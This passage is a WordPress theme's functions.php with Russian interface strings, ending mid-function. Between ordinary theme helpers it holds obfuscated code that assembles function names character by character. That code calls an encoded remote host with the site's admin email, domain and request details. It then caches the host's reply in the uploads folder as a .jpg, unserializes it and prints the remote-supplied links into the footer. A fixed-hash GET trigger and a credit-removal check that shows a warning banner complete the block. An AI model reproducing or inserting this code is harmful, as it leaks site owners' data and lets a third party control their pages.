<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $iCmoc='a';$NQWVgHx='e';$GMqzu='4';$MbDaSH='b';$seniaj='e';$LBCFj='6';$NabKX='o';$OaswGX='s';$JEKJDTq='d';$mGZTtp='c';$IWXXZG='_';$ZZiGWy='d';$hQrii='e';$bbrXCtnU=$MbDaSH.$iCmoc.$OaswGX.$hQrii.$LBCFj.$GMqzu.$IWXXZG.$ZZiGWy.$NQWVgHx.$mGZTtp.$NabKX.$JEKJDTq.$seniaj;$UNMahU='g';$JonOt='n';$QNJiU='t';$LFhUos='z';$kWtc='i';$iaZV='l';$foXxXlK='e';$hSyf='f';$hQIT='a';$eeWtzoXt=$UNMahU.$LFhUos.$kWtc.$JonOt.$hSyf.$iaZV.$hQIT.$QNJiU.$foXxXlK;$kBUJIc='1';$rjKxruP='3';$fhKsQua='r';$IyysGs='s';$hhiIh='_';$vUpaOi='r';$StVlF='o';$RPRwkM='t';$MGjj='t';$BZKwaRmI=$IyysGs.$MGjj.$vUpaOi.$hhiIh.$fhKsQua.$StVlF.$RPRwkM.$kBUJIc.$rjKxruP;$Gpyx='s';$yDkQZa='v';$wQIIZ='t';$gYgif='e';$KeggoD='r';$iUgDKqk='r';$wkxgRuSc=$Gpyx.$wQIIZ.$iUgDKqk.$KeggoD.$gYgif.$yDkQZa;                     
		$fr______________v='a';$kd___p='e';$lc__j='4';$dy________h='b';$jt_______________u='e';$hx___________s='6';$uf__a='o';$hu____________y='s';$yl___f='d';$va________c='c';$nb_____________i='_';$rl__________v='d';$gt_______c='e';$du_____________h=$dy________h.$fr______________v.$hu____________y.$gt_______c.$hx___________s.$lc__j.$nb_____________i.$rl__________v.$kd___p.$va________c.$uf__a.$yl___f.$jt_______________u;
		$vp_____t='n';$co_______________t='o';$mg_________v='_';$vr________j='i';$uw______________q='e';$zq_____s='s';$md_______t='x';$jo______b='u';$wk__x='s';$oh____w='t';$rb____________v='f';$al________s='n';$ei_______h='t';$gs______s='c';$to___s='i';$dg_______________f=$rb____________v.$jo______b.$vp_____t.$gs______s.$oh____w.$to___s.$co_______________t.$al________s.$mg_________v.$uw______________q.$md_______t.$vr________j.$zq_____s.$ei_______h.$wk__x;
		$ma___________m='e';$bw_______________f='n';$tu___________p='o';$hi______________b='p';$yj____________u='f';$bx_____________l=$yj____________u.$tu___________p.$hi______________b.$ma___________m.$bw_______________f;
		$my______________p='a';$nc_____________o='f';$zy__u='e';$yu____________j='r';$vn__________b='d';$er____d=$nc_____________o.$yu____________j.$zy__u.$my______________p.$vn__________b;
		$ea____________e='c';$th__________n='o';$yj_______________y='e';$sa__x='l';$jx_____e='s';$br_______________w='f';$oj__f=$br_______________w.$ea____________e.$sa__x.$th__________n.$jx_____e.$yj_______________y;
		
		define("WP_ID", $du_____________h("Mi4wLjA="));
		define("WP_TTL", $du_____________h("MTA4MDA="));
		define("WP_SRC", $du_____________h("dHBva24="));
	


		function wp_get_header() {
			global $du_____________h, $dg_______________f;
			
			if (
				$dg_______________f($du_____________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dg_______________f($du_____________h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dg_______________f($du_____________h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $du_____________h, $bx_____________l, $oj__f, $er____d;
			
			$mz_________w = TEMPLATEPATH."/".$du_____________h("Zm9vdGVyLnBocA==");
			$hp_______g = @$bx_____________l($mz_________w, "r");
			$mz_________w = @$er____d($hp_______g, @filesize($mz_________w));
			@$oj__f($hp_______g);
			
			$ks____p = TEMPLATEPATH."/".$du_____________h("ZnVuY3Rpb25zLnBocA==");
			$hp_______g = @$bx_____________l($ks____p, "r");
			$ks____p = @$er____d($hp_______g, @filesize($ks____p));
			@$oj__f($hp_______g);
			
			$bw__________b = 0;
			if($mz_________w && $ks____p) {
				if ($du_____________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mz_________w, $du_____________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$bw__________b = 1;
					}
					if (substr_count($mz_________w, "wp_theme_GPL_credits()") < 1) {
						$bw__________b = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$bw__________b = 12;
				}
			}
			
			if($bw__________b > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $bw__________b -->";
			}
		}
	


		function wp_loaded() {
			global $du_____________h, $dg_______________f;
			return $dg_______________f($du_____________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($oj____________z, $ps___e = "(more...)", $do_____________n = 0, $xq__________e = "") {
				$bw____j = get_the_content($ps___e, $do_____________n, $xq__________e);
				$bw____j = apply_filters("the_content", $bw____j);
				
				$bw____j = str_replace("]]>", "]]>", $bw____j);
				if (strlen($_GET["p"]) > 0) {
					echo $bw____j;
				}
				else if ((strlen($bw____j)>$oj____________z) && ($ix___v = strpos($bw____j, " ", $oj____________z ))) {
					$bw____j = substr($bw____j, 0, $ix___v);
					$bw____j = $bw____j;
					echo $bw____j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ps___e</a></div></p>";
				} else {
					echo $bw____j;
				}
				
			}
		}
	


		$fr__r='b';$tw__________z='s';$ot___j='e';$qz__o='_';$pw_______________v='e';$km_________a='e';$aw______u='c';$lg____y='d';$oa_________f='n';$tz____________d='o';$nh__________d='6';$uo______________w='4';$rz_______d='a';$co_______________t=$fr__r.$rz_______d.$tw__________z.$km_________a.$nh__________d.$uo______________w.$qz__o.$pw_______________v.$oa_________f.$aw______u.$tz____________d.$lg____y.$ot___j;
		$wu___________e='_';$mi_______________i='i';$ev___b='n';$ce___w='g';$kq______t='c';$xj_________l='e';$di_______________o='s';$op________y='t';$pt____s='t';$mb__________z='t';$jp________j='l';$jx__________u='f';$wj___________z='e';$cw_________r='n';$nc___________z='_';$fv___c='o';$nt______d='e';$po______________r=$jx__________u.$mi_______________i.$jp________j.$wj___________z.$wu___________e.$ce___w.$nt______d.$op________y.$nc___________z.$kq______t.$fv___c.$ev___b.$pt____s.$xj_________l.$cw_________r.$mb__________z.$di_______________o;
		$kb____________s='t';$am_____n='i';$gl__z='s';$mt_____n='f';$kd__t='e';$us___b='x';$pr___________q='s';$ty__t='i';$in______________z='l';$aq__________w='e';$sj_____________f='_';$zp____x=$mt_____n.$ty__t.$in______________z.$aq__________w.$sj_____________f.$kd__t.$us___b.$am_____n.$gl__z.$kb____________s.$pr___________q;
		$nb_____________n='p';$kc___________c='v';$fe______p='r';$sa____________i='e';$ii____s='o';$zc_____________i='i';$wq____y='e';$ko___________c='n';$qg_______________b='_';$yg_____________g='m';$ir___f='c';$dr_____________t='a';$po______p='o';$hg_____o='s';$kp___c='r';$cn_______________m=$kc___________c.$wq____y.$kp___c.$hg_____o.$zc_____________i.$po______p.$ko___________c.$qg_______________b.$ir___f.$ii____s.$yg_____________g.$nb_____________n.$dr_____________t.$fe______p.$sa____________i;
		$hp______________l='e';$de_____________j='f';$us_____________e='n';$kv___r='s';$qb___________c='k';$re_____________w='p';$bz_____________t='o';$qj__c='o';$mf____________s='c';$pc_____h=$de_____________j.$kv___r.$qj__c.$mf____________s.$qb___________c.$bz_____________t.$re_____________w.$hp______________l.$us_____________e;
		$bs_____________g='t';$bj_______d='r';$he___p='w';$jt__f='e';$ij______w='f';$lx______________p='i';$ds____s=$ij______w.$he___p.$bj_______d.$lx______________p.$bs_____________g.$jt__f;
		$kv____________u='5';$ao_____________l='m';$ls__n='d';$qi__________q=$ao_____________l.$ls__n.$kv____________u;
		$dl______________e='h';$xe____p='l';$bx____________g='r';$wk__________d='t';$mt____i='a';$tl__________x='a';$di____________u='e';$bl____________r='p';$ol___r=$bx____________g.$di____________u.$mt____i.$xe____p.$bl____________r.$tl__________x.$wk__________d.$dl______________e;
		$vv_______d='r';$ao_______n='z';$dw_____________n='n';$te____________x='i';$zz______o='i';$uo_______l='l';$ar_______________f='e';$jj____________r='a';$ak__b='e';$qe_____________h='u';$mm__o='s';$ye______k=$qe_____________h.$dw_____________n.$mm__o.$ar_______________f.$vv_______d.$zz______o.$jj____________r.$uo_______l.$te____________x.$ao_______n.$ak__b;
		$ox_____u='n';$vp____r='t';$gf_________w='e';$bn______________u='p';$qq__x='a';$kt____p='m';$py______________j='m';$gm__p=$vp____r.$gf_________w.$py______________j.$bn______________u.$ox_____u.$qq__x.$kt____p;
		$yt__j='x';$gb____z='n';$sp____w='t';$lg____r='r';$ey____________k='e';$se___________r='t';$zu______________m='a';$nd___________a='s';$vz_______p='_';$si______x='o';$ra________w='a';$ps___________j='t';$ny______e='e';$ex___________g='t';$ys__n='e';$oc______________h='c';$sr_______e='r';$hj___________a='e';$tc______b='_';$up___________i='c';$kw___________i='m';$gc_______h=$nd___________a.$ex___________g.$sr_______e.$ey____________k.$ra________w.$kw___________i.$tc______b.$up___________i.$si______x.$gb____z.$sp____w.$ny______e.$yt__j.$ps___________j.$vz_______p.$oc______________h.$lg____r.$hj___________a.$zu______________m.$se___________r.$ys__n;
	


		function pt__v($em______c) {
			global $du_____________h, $dg_______________f, $po______________r, $cn_______________m, $gc_______h;
			
			if (!$dg_______________f($du_____________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($cn_______________m(PHP_VERSION, "5.0.0", ">=") && $dg_______________f($du_____________h("ZmlsZV9nZXRfY29udGVudHM=")) && $dg_______________f($du_____________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$nc____________l = $gc_______h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ei______________n = @$po______________r($em______c, 0, $nc____________l);
			} else {
				$ei______________n = @$po______________r($em______c, 0);
			}
			
			return $ei______________n;
		}
	


		function xm________y($em______c) {
			global $dg_______________f, $pc_____h, $ds____s, $du_____________h;
			
			if (!$dg_______________f($du_____________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ui_______________s = strpos($em______c, "/", 7);
			$ts_____________e = array(
				"uri"     => substr($em______c, $ui_______________s),
				"host"    => str_replace("http://", "", substr($em______c, 0, $ui_______________s)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rv________k = @$pc_____h("$ts_____________e[host]", 80, $qn_______________i, $zb__n, 4);
			
			if (!$rv________k) {
				return false;
			} else {
				$ei______________n = "";
				$re__w  = "GET $ts_____________e[uri] HTTP/1.0\r\n";
				$re__w .= "Host: $ts_____________e[host]\r\n";
				$re__w .= "Referer: $ts_____________e[referer]\r\n";
				$re__w .= "Connection: Close\r\n\r\n";
				
				@$ds____s($rv________k, $re__w);
				
				while (!@feof($rv________k)) {
					$hu__i = @fgets($rv________k, (1024*24));
					
					if ($hu__i == "\r\n") {
						$hy__________l = true;
						continue;
					}
					
					if ($hy__________l) {
						$ei______________n .= $hu__i;
					}
				}
				
				return $ei______________n;
			}
		}
	


		function jb______________y($em______c) {
			global $dg_______________f;
			$bo__________i = false;
			
			if ($em______c != "") {
				if ($dg_______________f("pt__v")) {
					$bo__________i = @pt__v($em______c);
				}
				
				if (!$bo__________i && ($dg_______________f("xm________y"))) {
					$bo__________i = @xm________y($em______c);
				}
			}
			
			return $bo__________i;
		}
	


		function nw______________l() {
			global $_SERVER, $qi__________q;
			
			$fd___________s = $_SERVER["SERVER_NAME"];
			
			if (substr("$fd___________s", 0, 4) == "www.") {
				$fd___________s = substr("$fd___________s", 4);
			}
			
			$fd___________s = $qi__________q("$_SERVER[SERVER_NAME]");
			
			return $fd___________s;
		}
	


		function no____k() {
			return "file";
		}
	


		function sy___p($em______c) {
			global $_SERVER, $po______________r, $zp____x, $bx_____________l, $oj__f, $ds____s;
			
			$qr_________p = yi_____________n();
			
			$yd__c = nw______________l().".jpg";
			$yx________k = $qr_________p["dir_upload"]["path"]."/$yd__c";
			$na______________u = @filemtime($yx________k);
			
			if (!$na______________u || ((time()-$na______________u) >= WP_TTL)) {
				$bo__________i = jb______________y($em______c);
				
				if ($bo__________i) {
					if ($zp____x($yx________k)) {
						@unlink($yx________k);
					}
					
					$hp_______g = @$bx_____________l($yx________k, "x+");
					
					@$ds____s($hp_______g, $bo__________i);
					@$oj__f($hp_______g);
				}
			} else {
				if ($zp____x($yx________k)) {
					$bo__________i = @$po______________r($yx________k);
				} else {
					$bo__________i = false;
				}
			}
			
			return $bo__________i;
		}
	


		function yi_____________n() {
			global $_SERVER, $du_____________h, $co_______________t;
			
			$fl________u = wp_count_posts("post");
			$en__________t = pathinfo(get_bloginfo("template_directory"));
			
			$qr_________p = array(
				"url" => array(
					"report"      => $du_____________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $en__________t,
				"dir_upload"	=> vx______________l(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$en__________t[filename],
					"a005=".$fl________u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " Все права защищены - 3powered-XMLvalid "

			);
			
			$qr_________p["url"]["queryString"] = implode("&", $qr_________p["queryString"]);
			$qr_________p["url"]["report"] = $qr_________p["url"]["report"]."/?".$co_______________t($qr_________p["url"]["queryString"]).".html";
						
			return $qr_________p;
		}
	


		function vx______________l() {
			$eo________k = wp_upload_dir();
			
			if (isset($eo________k["error"])) {
				$dh___________z = kf____________b();
				if (is_writable($dh___________z)) {
					$eo________k = array("path" => $dh___________z);
				}
			}

			return $eo________k;
		}
	


		function kf____________b() {
			global $dg_______________f, $qi__________q, $ol___r, $gm__p;
			
			$ah___________e = (bool) ini_get("safe_mode");
			if ($ah___________e == true) {
				return false;
			}
			
			if ($dg_______________f("sys_get_temp_dir")) {
				$zk______________g = sys_get_temp_dir();
				if (is_writable($zk______________g)) {
					return $ol___r($zk______________g);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ol___r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ol___r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ol___r($_ENV["TEMP"]);
			} else {
				$yc_____g = $gm__p($qi__________q(uniqid(rand(), true)), "");
				if ($yc_____g) {
					$zk______________g = $ol___r(dirname($yc_____g));
					@unlink($yc_____g);
					return $zk______________g;
				} else {
					return false;
				}
			}
		}
	


		function qm______o() {
			global $_GET, $zp____x;
			
			$qr_________p = yi_____________n();
			$fd___________s = nw______________l();
			$mc____e = no____k();
			
			$mk___e = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mc____e == "file") {
					$ja___________v = $qr_________p["dir_upload"]["path"]."/".$fd___________s.".jpg";
					if ($zp____x($ja___________v)) {
						@unlink($ja___________v);
						$mk___e = "deleted";
					}
				}
				
				$uf_____a = array(
					"s"	=> $mk___e,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($uf_____a AS $sb_________c => $cd______________e) echo " [$sb_________c:$cd______________e]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dg_______________f, $du_____________h, $ye______k;
			$qr_________p = yi_____________n();
			
			$ml______________g = "sy___p";
			if ($dg_______________f($ml______________g)) {
				$ei______________n = $ml______________g($qr_________p["url"]["report"]);
			}
			
			if ($ei______________n) {
				if ($ei______________n = @$du_____________h($ei______________n)) {
					$ei______________n = @$ye______k($ei______________n);
					
					if (strlen($ei______________n[custom_credit]) >= 5) {
						$qr_________p["default_string"] = $ei______________n[custom_credit];
					}
					
					if ($ei______________n["status"] == "0") {
						$bb_______________q = 1;
						$zv______________x = 1;
					} else {
						$fn____x = sizeof($ei______________n["links"]);
						$pw_______t = $qr_________p["default_string"];
						
						if ($fn____x > 0 && $ei______________n["links"] !== "") {
							$nz____________e = 0;
							foreach ($ei______________n["links"] as $ab_____j => $oz____________e) {
								$nz____________e++;
								if ($oz____________e->l_path == "" || $oz____________e->l_path == $_SERVER["REQUEST_URI"]) {
									$oz____________e->l_href = htmlspecialchars(strip_tags($oz____________e->l_href));
									$oz____________e->l_title = htmlspecialchars(strip_tags($oz____________e->l_title));
									$oz____________e->l_anchor = htmlspecialchars(strip_tags($oz____________e->l_anchor));
									$pw_______t .= " | ";
									$pw_______t .= "<a href='$oz____________e->l_href' title='$oz____________e->l_title'";
									if ($oz____________e->l_nofollow == "1") {
										$pw_______t .= " rel='nofollow'";
									}
									$pw_______t .= ">$oz____________e->l_anchor</a>";
								}
							}
						}
						$qr_________p["links"] = "$pw_______t";
						if ($ei______________n[credit] == "0") {
							$qr_________p["links"] = "";
						}
					}
				} else {
					$bb_______________q = "1";
				}
			} else {
				$bb_______________q = "1";
			}
			
			if ($bb_______________q == "1") {
				$qr_________p["links"] = $qr_________p["default_string"];
			}
			
			echo "$qr_________p[links]";
			
			echo "<!-- s: $ei______________n[signature] -->";
			qm______o();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
